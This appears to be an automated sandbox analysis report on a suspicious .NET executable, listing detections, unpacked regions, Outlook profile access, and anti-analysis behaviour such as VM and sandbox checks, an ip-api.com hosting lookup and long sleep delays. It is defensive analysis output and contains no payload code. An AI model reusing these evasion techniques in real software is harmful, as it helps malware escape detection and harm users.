ReversingLabs: Detection: 47%

Source: unknown	Process created: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe "C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe"
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process created: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe "C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe"
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process created: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe "C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe"	Jump to behavior

Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source: T_240369_S#U0130PAR#U0130S.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: T_240369_S#U0130PAR#U0130S.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: T_240369_S#U0130PAR#U0130S.exe

Static file information: File size 2987520 > 1048576

Source: T_240369_S#U0130PAR#U0130S.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x2d8c00

Source: T_240369_S#U0130PAR#U0130S.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.00000000048EF000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.0000000004967000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1650391650.0000000005C80000.00000004.08000000.00040000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.00000000048EF000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.0000000004967000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1650391650.0000000005C80000.00000004.08000000.00040000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.000000000477F000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.000000000485F000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1649013598.0000000005AF0000.00000004.08000000.00040000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.000000000477F000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.000000000485F000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1649013598.0000000005AF0000.00000004.08000000.00040000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.T_240369_S#U0130PAR#U0130S.exe.5c80000.17.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.T_240369_S#U0130PAR#U0130S.exe.5c80000.17.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.T_240369_S#U0130PAR#U0130S.exe.5c80000.17.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties

Yara detected Costura Assembly Loader

Source: Yara match	File source: 0.2.T_240369_S#U0130PAR#U0130S.exe.468f600.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.T_240369_S#U0130PAR#U0130S.exe.46675e0.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.T_240369_S#U0130PAR#U0130S.exe.31ee1f4.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.T_240369_S#U0130PAR#U0130S.exe.468f600.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.T_240369_S#U0130PAR#U0130S.exe.5c10000.16.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.T_240369_S#U0130PAR#U0130S.exe.477f640.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.T_240369_S#U0130PAR#U0130S.exe.46675e0.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.T_240369_S#U0130PAR#U0130S.exe.31ee1f4.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.T_240369_S#U0130PAR#U0130S.exe.41af790.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1650117594.0000000005C10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1641702888.000000000477F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1641702888.0000000003F81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: T_240369_S#U0130PAR#U0130S.exe PID: 7304, type: MEMORYSTR

Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 0_2_02F60F5D push edi; retf	0_2_02F60F60
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 0_2_02F64C70 push eax; ret	0_2_02F64C71
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 0_2_05ADF4E4 push es; iretd	0_2_05ADF4E7
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 0_2_05B4A870 push ebx; ret	0_2_05B4A877
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 0_2_05B42390 pushad ; iretd	0_2_05B42391
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 0_2_05E6842A pushad ; iretd	0_2_05E6842B
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 0_2_05E67E76 push ss; iretw	0_2_05E67E77
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 1_2_01140CA1 push edi; retf	1_2_01140CAA
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 1_2_066642D7 push ebx; ret	1_2_066642DA

Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: T_240369_S#U0130PAR#U0130S.exe PID: 7304, type: MEMORYSTR

Check if machine is in data center or colocation facility

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL0SELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILURE
Source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.00000000049EB000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000001.00000002.4084734470.0000000000402000.00000040.00000400.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000001.00000002.4087078052.0000000002B61000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Memory allocated: 15C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Memory allocated: 2F80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Memory allocated: 15C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Memory allocated: 1140000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Memory allocated: 2B60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Memory allocated: 29B0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 599125	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 598793	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 598687	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 598578	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 598468	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 598359	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 598250	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 598140	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 598031	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 597921	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 597812	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 597593	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 597484	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 597374	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 597265	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 597156	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 597046	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 596935	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 596828	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 596715	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 596609	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 596499	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 596390	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 596281	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 596171	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 596062	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 595953	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 595843	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 595734	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 595625	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 595515	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 595406	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 595296	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 595187	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 595078	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 594959	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 594828	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 594718	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Thread delayed: delay time: 594607	Jump to behavior

Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Window / User API: threadDelayed 8370			Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Window / User API: threadDelayed 1486			Jump to behavior

Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7324	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476	Thread sleep count: 34 > 30	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476	Thread sleep time: -31359464925306218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476	Thread sleep time: -599890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7480	Thread sleep count: 8370 > 30	Jump to behavior
